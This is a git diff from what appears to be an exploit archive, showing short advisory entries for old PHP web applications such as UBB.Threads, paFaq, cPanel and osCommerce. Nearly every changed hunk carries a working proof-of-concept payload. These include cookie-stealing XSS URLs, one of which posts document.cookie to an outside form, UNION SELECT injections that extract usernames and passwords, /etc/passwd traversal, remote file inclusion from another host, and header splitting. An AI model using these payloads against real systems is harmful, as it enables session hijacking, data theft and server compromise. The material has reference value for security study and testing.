-Version 0.93u/ 0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/ \ No newline at end of file +Version 0.93u/ 0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25793.txt b/platforms/php/webapps/25793.txt old mode 100755 new mode 100644 index 8f2e49e41..d0dda4620 --- a/platforms/php/webapps/25793.txt +++ b/platforms/php/webapps/25793.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue is reported to affect YaPiG versions 0.92b, 0.93u and 0.94u; earlier versions may also be affected. -http://www.example.com/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25794.txt b/platforms/php/webapps/25794.txt old mode 100755 new mode 100644 index c59f5acd0..67ce85936 --- a/platforms/php/webapps/25794.txt +++ b/platforms/php/webapps/25794.txt @@ -10,4 +10,4 @@ Arbitrary Directory Removal: http://www.example.com/upload.php?step=rmdir&dir=../folder Arbitrary Directory Creation: -http://www.example.com/upload.php?step=mkdir&dir=../folder \ No newline at end of file +http://www.example.com/upload.php?step=mkdir&dir=../folder \ No newline at end of file diff --git a/platforms/php/webapps/25799.txt b/platforms/php/webapps/25799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25800.txt b/platforms/php/webapps/25800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25801.php b/platforms/php/webapps/25801.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25803.txt b/platforms/php/webapps/25803.txt old mode 100755 new mode 100644 index f2e67d89b..3b0a995a8 --- a/platforms/php/webapps/25803.txt +++ b/platforms/php/webapps/25803.txt @@ -6,4 +6,4 @@ These issues could permit a remote attacker to create a malicious URI link that Cerberus Helpdesk version 0.97.3 to 2.6.1 are vulnerable to these issues. -http://www.example.com/cerberus/index.php?errorcode=[Xss]&errorvalue=4&sid=[sessionid] \ No newline at end of file +http://www.example.com/cerberus/index.php?errorcode=[Xss]&errorvalue=4&sid=[sessionid] \ No newline at end of file diff --git a/platforms/php/webapps/25806.txt b/platforms/php/webapps/25806.txt old mode 100755 new mode 100644 index 6074689f8..d780dc176 --- a/platforms/php/webapps/25806.txt +++ b/platforms/php/webapps/25806.txt @@ -10,4 +10,4 @@ Invision Gallery 1.3.0 and prior are vulnerable. http://www.example.com/index.php?act=module&module=gallery&cmd=editcomment&comment= -99%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,name,0,0,0%20FROM%20ibf_members%20 -WHERE%201/*&img=1 \ No newline at end of file +WHERE%201/*&img=1 \ No newline at end of file diff --git a/platforms/php/webapps/25808.txt b/platforms/php/webapps/25808.txt old mode 100755 new mode 100644 index b49af764b..2782d04e5 --- a/platforms/php/webapps/25808.txt +++ b/platforms/php/webapps/25808.txt @@ -10,4 +10,4 @@ SQL Injection http://www.example.com/index.php?automodule=blog&blogid=1&cmd=editentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201/* http://www.example.com/index.php?automodule=blog&blogid=1&cmd=replyentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201/* http://www.example.com/index.php?automodule=blog&blogid=1&cmd=editcomment&eid=1&cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_members%20WHERE%201/* -http://www.example.com/index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2' \ No newline at end of file +http://www.example.com/index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2' \ No newline at end of file diff --git a/platforms/php/webapps/25816.txt b/platforms/php/webapps/25816.txt old mode 100755 new mode 100644 index 3d1d54630..9f1ebdf88 --- a/platforms/php/webapps/25816.txt +++ b/platforms/php/webapps/25816.txt @@ -4,4 +4,4 @@ Ovidentia FX is prone to a remote file include vulnerability. An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/ovidentia/index.php?babInstallPath=http://www.example.com \ No newline at end of file +http://www.example.com/ovidentia/index.php?babInstallPath=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25818.txt b/platforms/php/webapps/25818.txt old mode 100755 new mode 100644 index 036be11f1..8c8ac5e3c --- a/platforms/php/webapps/25818.txt +++ b/platforms/php/webapps/25818.txt @@ -4,4 +4,4 @@ Singapore image gallery is prone to a cross-site scripting vulnerability. This i An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/index.php?gallery=%3Cimg%20onmouseover=%22alert('hi')%22%20style=%22position:%20absolute;%20top:0px;%20left:%200px;%20width:%201000%;%20height:%201000%;%22%3E \ No newline at end of file +http://www.example.com/index.php?gallery=%3Cimg%20onmouseover=%22alert('hi')%22%20style=%22position:%20absolute;%20top:0px;%20left:%200px;%20width:%201000%;%20height:%201000%;%22%3E \ No newline at end of file diff --git a/platforms/php/webapps/25819.txt b/platforms/php/webapps/25819.txt old mode 100755 new mode 100644 index f77a02545..48bdde081 --- a/platforms/php/webapps/25819.txt +++ b/platforms/php/webapps/25819.txt @@ -8,4 +8,4 @@ The application is affected by a local file include vulnerability. The attacker FusionBB is prone to multiple SQL injection vulnerabilities as well. These vulnerabilities could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -Cookie: bb_session_id=' or user_id = '1; bb_uid=1; \ No newline at end of file +Cookie: bb_session_id=' or user_id = '1; bb_uid=1; \ No newline at end of file diff --git a/platforms/php/webapps/2582.txt b/platforms/php/webapps/2582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25821.txt b/platforms/php/webapps/25821.txt old mode 100755 new mode 100644 index aed548ab2..2b04b15fc --- a/platforms/php/webapps/25821.txt +++ b/platforms/php/webapps/25821.txt @@ -4,4 +4,4 @@ Annuaire 1Two is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/index.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25823.txt b/platforms/php/webapps/25823.txt old mode 100755 new mode 100644 index 67f71ff22..7c5c7984b --- a/platforms/php/webapps/25823.txt +++ b/platforms/php/webapps/25823.txt @@ -4,4 +4,4 @@ McGallery is prone to a file disclosure vulnerability. This could let remote attackers access files on the computer in the context of the Web server process. -http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd \ No newline at end of file +http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/25824.txt b/platforms/php/webapps/25824.txt old mode 100755 new mode 100644 index 666d0d92f..5da0202e1 --- a/platforms/php/webapps/25824.txt +++ b/platforms/php/webapps/25824.txt @@ -40,4 +40,4 @@ http://www.example.com/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do& query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28% 20WHERE%201/* -http://www.example.com/pafiledb.php?action=../../../../etc/passwd%00&login=do \ No newline at end of file +http://www.example.com/pafiledb.php?action=../../../../etc/passwd%00&login=do \ No newline at end of file diff --git a/platforms/php/webapps/25825.txt b/platforms/php/webapps/25825.txt old mode 100755 new mode 100644 index 002127302..afaa09a81 --- a/platforms/php/webapps/25825.txt +++ b/platforms/php/webapps/25825.txt @@ -14,4 +14,4 @@ http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25826.txt b/platforms/php/webapps/25826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25827.txt b/platforms/php/webapps/25827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25828.txt b/platforms/php/webapps/25828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25829.txt b/platforms/php/webapps/25829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2583.php b/platforms/php/webapps/2583.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25830.txt b/platforms/php/webapps/25830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25831.txt b/platforms/php/webapps/25831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25832.txt b/platforms/php/webapps/25832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25833.txt b/platforms/php/webapps/25833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25834.txt b/platforms/php/webapps/25834.txt old mode 100755 new mode 100644 index bd9f2a501..0764a9ea2 --- a/platforms/php/webapps/25834.txt +++ b/platforms/php/webapps/25834.txt @@ -10,4 +10,4 @@ http://www.example.com/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B http://www.example.com/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter http://www.example.com/ATutor/directory.php?roles%5B%5D=1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE] http://www.example.com/ATutor/directory.php?roles%5B%5D=1&status=2&reset_filter=Reset+Filter[XSS-CODE] -http://www.example.com/ATutor/directory.php?roles[]=1[XSS-CODE] \ No newline at end of file +http://www.example.com/ATutor/directory.php?roles[]=1[XSS-CODE] \ No newline at end of file diff --git a/platforms/php/webapps/25840.txt b/platforms/php/webapps/25840.txt old mode 100755 new mode 100644 index 8e2824c40..6d295fbcb --- a/platforms/php/webapps/25840.txt +++ b/platforms/php/webapps/25840.txt @@ -5,4 +5,4 @@ osCommerce is prone to multiple HTTP response splitting vulnerabilities. These i A remote attacker may exploit any of these vulnerabilities to influence or misrepresent how Web content is served, cached or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust. http://www.example.com/index.php?action=buy_now&products_id=22%0d%0atest:%20poison%20headers! -http://www.example.com/index.php?action=cust_order&pid=2%0d%0atest:%20poison%20headers! \ No newline at end of file +http://www.example.com/index.php?action=cust_order&pid=2%0d%0atest:%20poison%20headers! \ No newline at end of file diff --git a/platforms/php/webapps/25846.txt b/platforms/php/webapps/25846.txt old mode 100755 new mode 100644 index 947f903aa..bfa78618d --- a/platforms/php/webapps/25846.txt +++ b/platforms/php/webapps/25846.txt @@ -4,4 +4,4 @@ It is reported that cPanel is prone to a cross-site scripting vulnerability that Due to the possibility of attacker-specified HTML and script code being rendered in a victim's browser, it is possible to steal cookie-based authentication credentials from that user. Other attacks are possible as well. -http://www.example.com:2082/login?user=**<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com:2082/login?user=**<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/25849.txt b/platforms/php/webapps/25849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2585.txt b/platforms/php/webapps/2585.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25854.txt b/platforms/php/webapps/25854.txt old mode 100755 new mode 100644 index 0711d56d3..9122c3d5c --- a/platforms/php/webapps/25854.txt +++ b/platforms/php/webapps/25854.txt @@ -4,4 +4,4 @@ paFaq is prone to a cross-site scripting vulnerability. This issue is due to a f An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/25856.txt b/platforms/php/webapps/25856.txt old mode 100755 new mode 100644 index 313ba8b22..5d070c1b9 --- a/platforms/php/webapps/25856.txt +++ b/platforms/php/webapps/25856.txt @@ -4,4 +4,4 @@ paFaq is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar \ No newline at end of file +http://www.example.com/pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar \ No newline at end of file diff --git a/platforms/php/webapps/25857.txt b/platforms/php/webapps/25857.txt old mode 100755 new mode 100644 index b85663f65..03244fea8 --- a/platforms/php/webapps/25857.txt +++ b/platforms/php/webapps/25857.txt @@ -6,4 +6,4 @@ The problem presents itself specifically when an attacker passes the location of An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/include/config_settings.php?config[include_path]=http://www.example2.com/ \ No newline at end of file +http://www.example.com/include/config_settings.php?config[include_path]=http://www.example2.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25859.txt b/platforms/php/webapps/25859.txt old mode 100755 new mode 100644 index 0050f0624..46743caa4 --- a/platforms/php/webapps/25859.txt +++ b/platforms/php/webapps/25859.txt @@ -6,4 +6,4 @@ The problem presents itself specifically when an attacker passes the location of An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. -http://www.example.com/path_of_cacti/include/top_graph_header.php?config[library_path]=http://www.exmpale2.com/ \ No newline at end of file +http://www.example.com/path_of_cacti/include/top_graph_header.php?config[library_path]=http://www.exmpale2.com/ \ No newline at end of file diff --git a/platforms/php/webapps/25860.txt b/platforms/php/webapps/25860.txt old mode 100755 new mode 100644 index d39a1f209..0c1a33fd7 --- a/platforms/php/webapps/25860.txt +++ b/platforms/php/webapps/25860.txt @@ -4,4 +4,4 @@ DUamazon Pro is prone to multiple SQL injection vulnerabilities. These issues ar Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUamazon/type.asp?iType=1[SQL inject] \ No newline at end of file +http://www.example.com/DUamazon/type.asp?iType=1[SQL inject] \ No newline at end of file diff --git a/platforms/php/webapps/25861.txt b/platforms/php/webapps/25861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25862.txt b/platforms/php/webapps/25862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25875.txt b/platforms/php/webapps/25875.txt old mode 100755 new mode 100644 index b9a998350..f61cc8a53 --- a/platforms/php/webapps/25875.txt +++ b/platforms/php/webapps/25875.txt @@ -4,4 +4,4 @@ Whois.Cart is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/whoiscart/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2Fwww.example.com%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E \ No newline at end of file +http://www.example.com/whoiscart/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2Fwww.example.com%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E \ No newline at end of file diff --git a/platforms/php/webapps/25876.txt b/platforms/php/webapps/25876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25877.txt b/platforms/php/webapps/25877.txt old mode 100755 new mode 100644 index 7cdbf593d..55146a060 --- a/platforms/php/webapps/25877.txt +++ b/platforms/php/webapps/25877.txt @@ -4,4 +4,4 @@ Forum Russian Board is prone to multiple input validation vulnerabilities. These Forum Russian Board 4.2 is reported to be affected. -[img]wink.gif onerror=javascript:alert(document.cookie);[/img] \ No newline at end of file +[img]wink.gif onerror=javascript:alert(document.cookie);[/img] \ No newline at end of file diff --git a/platforms/php/webapps/25878.txt b/platforms/php/webapps/25878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25879.txt b/platforms/php/webapps/25879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2588.txt b/platforms/php/webapps/2588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25880.txt b/platforms/php/webapps/25880.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25881.txt b/platforms/php/webapps/25881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25882.txt b/platforms/php/webapps/25882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25884.txt b/platforms/php/webapps/25884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25885.txt b/platforms/php/webapps/25885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25886.txt b/platforms/php/webapps/25886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25887.txt b/platforms/php/webapps/25887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25888.txt b/platforms/php/webapps/25888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25889.txt b/platforms/php/webapps/25889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2589.txt b/platforms/php/webapps/2589.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25890.txt b/platforms/php/webapps/25890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25891.txt b/platforms/php/webapps/25891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25892.txt b/platforms/php/webapps/25892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25893.txt b/platforms/php/webapps/25893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25894.txt b/platforms/php/webapps/25894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25895.txt b/platforms/php/webapps/25895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25897.txt b/platforms/php/webapps/25897.txt old mode 100755 new mode 100644 index 22041eb8c..9d16f7024 --- a/platforms/php/webapps/25897.txt +++ b/platforms/php/webapps/25897.txt @@ -4,4 +4,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ubbt/download.php?Number=42227[SQL] \ No newline at end of file +http://www.example.com/ubbt/download.php?Number=42227[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/25898.txt b/platforms/php/webapps/25898.txt old mode 100755 new mode 100644 index ab1691a6f..3cc4c0be9 --- a/platforms/php/webapps/25898.txt +++ b/platforms/php/webapps/25898.txt @@ -5,4 +5,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL] -http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005 \ No newline at end of file +http://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005 \ No newline at end of file diff --git a/platforms/php/webapps/25899.txt b/platforms/php/webapps/25899.txt old mode 100755 new mode 100644 index fc0a76cd8..cb1a20353 --- a/platforms/php/webapps/25899.txt +++ b/platforms/php/webapps/25899.txt @@ -4,4 +4,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post \ No newline at end of file +http://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post \ No newline at end of file diff --git a/platforms/php/webapps/2590.txt b/platforms/php/webapps/2590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25900.txt b/platforms/php/webapps/25900.txt old mode 100755 new mode 100644 index b1109ef31..7b835ce86 --- a/platforms/php/webapps/25900.txt +++ b/platforms/php/webapps/25900.txt @@ -4,4 +4,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received \ No newline at end of file +http://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received \ No newline at end of file diff --git a/platforms/php/webapps/25901.txt b/platforms/php/webapps/25901.txt old mode 100755 new mode 100644 index c40e9fdcd..ca6d618e9 --- a/platforms/php/webapps/25901.txt +++ b/platforms/php/webapps/25901.txt @@ -4,4 +4,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat \ No newline at end of file +http://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat \ No newline at end of file diff --git a/platforms/php/webapps/25902.txt b/platforms/php/webapps/25902.txt old mode 100755 new mode 100644 index fa2615f3e..c06dbd410 --- a/platforms/php/webapps/25902.txt +++ b/platforms/php/webapps/25902.txt @@ -4,4 +4,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded \ No newline at end of file +http://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded \ No newline at end of file diff --git a/platforms/php/webapps/25903.txt b/platforms/php/webapps/25903.txt old mode 100755 new mode 100644 index 906d9526e..3e343d8d6 --- a/platforms/php/webapps/25903.txt +++ b/platforms/php/webapps/25903.txt @@ -4,4 +4,4 @@ UBB.Threads is prone to multiple SQL injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL] \ No newline at end of file +http://www.example.com/ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/25904.c b/platforms/php/webapps/25904.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25909.txt b/platforms/php/webapps/25909.txt old mode 100755 new mode 100644 index bca472e99..3092febfb --- a/platforms/php/webapps/25909.txt +++ b/platforms/php/webapps/25909.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a http://www.example.com/mensajeitor.php?nick=megabyte&url=http://mbytesecurity.org&actualizar=null&titulo=aaa&ip='aa'>%3Ciframe%20src=http://mbytesecurity.org/bukle.htm&enviar =Enviar <http://www.example.com/mensajeitor.php?nick=megabyte&url=http://mbytesecurity.org&actualizar=null&titulo=aaa&ip=%27aa%27%3E%3Ciframe%20src=http://mbytesecurity.org/bukle.htm -&enviar=Enviar> \ No newline at end of file +&enviar=Enviar> \ No newline at end of file diff --git a/platforms/php/webapps/2591.txt b/platforms/php/webapps/2591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25919.txt b/platforms/php/webapps/25919.txt old mode 100755 new mode 100644 index 612969188..bccfd1df3 --- a/platforms/php/webapps/25919.txt +++ b/platforms/php/webapps/25919.txt @@ -6,4 +6,4 @@ Successful exploitation could allow the attacker to compromise security properti This issue has been reported to exist in Phorum 5.0.11. Earlier versions may also be affected. -http://www.example.com/read.php?1,[MALICIOUS_SQL_CODE],newer \ No newline at end of file +http://www.example.com/read.php?1,[MALICIOUS_SQL_CODE],newer \ No newline at end of file diff --git a/platforms/php/webapps/25926.txt b/platforms/php/webapps/25926.txt old mode 100755 new mode 100644 index 59a4facf4..7eef1c4b8 --- a/platforms/php/webapps/25926.txt +++ b/platforms/php/webapps/25926.txt @@ -10,4 +10,4 @@ The following specific issues were identified: osTicket 1.3.1 beta and prior versions are affected. -http://www.example.com/osticket/view.php?inc=x \ No newline at end of file +http://www.example.com/osticket/view.php?inc=x \ No newline at end of file diff --git a/platforms/php/webapps/25928.txt b/platforms/php/webapps/25928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25929.txt b/platforms/php/webapps/25929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2593.php b/platforms/php/webapps/2593.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25930.txt b/platforms/php/webapps/25930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25931.txt b/platforms/php/webapps/25931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25932.txt b/platforms/php/webapps/25932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25934.txt b/platforms/php/webapps/25934.txt old mode 100755 new mode 100644 index e49c35703..53afc1b76 --- a/platforms/php/webapps/25934.txt +++ b/platforms/php/webapps/25934.txt @@ -4,4 +4,4 @@ Plague News System is prone to an SQL injection vulnerability. As a result, the Other attacks may be possible depending on the capabilities of the underlying database and the nature of the affected query. -http://www.example.com/index.php?cid=[SQL Command] \ No newline at end of file +http://www.example.com/index.php?cid=[SQL Command] \ No newline at end of file diff --git a/platforms/php/webapps/25935.txt b/platforms/php/webapps/25935.txt old mode 100755 new mode 100644 index 6b1e8c336..a7103f34e --- a/platforms/php/webapps/25935.txt +++ b/platforms/php/webapps/25935.txt @@ -4,4 +4,4 @@ Plague News System is prone to a cross-site scripting vulnerability. This issue An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/index.php?cid=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/index.php?cid=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/25937.txt b/platforms/php/webapps/25937.txt old mode 100755 new mode 100644 index 392a0f274..04435969a --- a/platforms/php/webapps/25937.txt +++ b/platforms/php/webapps/25937.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this issue to delete site content and deny service http://www.example.com/delete.php?comment=1&id=[ID of comment here] http://www.example.com/delete.php?news=1&id=[ID of news here] -http://www.example.com/delete.php?shout=1&id=[ID of shout here] \ No newline at end of file +http://www.example.com/delete.php?shout=1&id=[ID of shout here] \ No newline at end of file diff --git a/platforms/php/webapps/25938.txt b/platforms/php/webapps/25938.txt old mode 100755 new mode 100644 index 1c55680a7..2fee4608b --- a/platforms/php/webapps/25938.txt +++ b/platforms/php/webapps/25938.txt @@ -6,4 +6,4 @@ All versions of phpPgAdmin are considered to be vulnerable at the moment. formUsername=username&formPassword=password&formServer=0&formLanguag e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et -c/passwd%00&submitLogin=Login \ No newline at end of file +c/passwd%00&submitLogin=Login \ No newline at end of file diff --git a/platforms/php/webapps/2594.php b/platforms/php/webapps/2594.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25940.txt b/platforms/php/webapps/25940.txt old mode 100755 new mode 100644 index 92d96a667..4824194a1 --- a/platforms/php/webapps/25940.txt +++ b/platforms/php/webapps/25940.txt @@ -4,4 +4,4 @@ AutoIndex PHP Script is prone to a cross-site scripting vulnerability. This issu An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 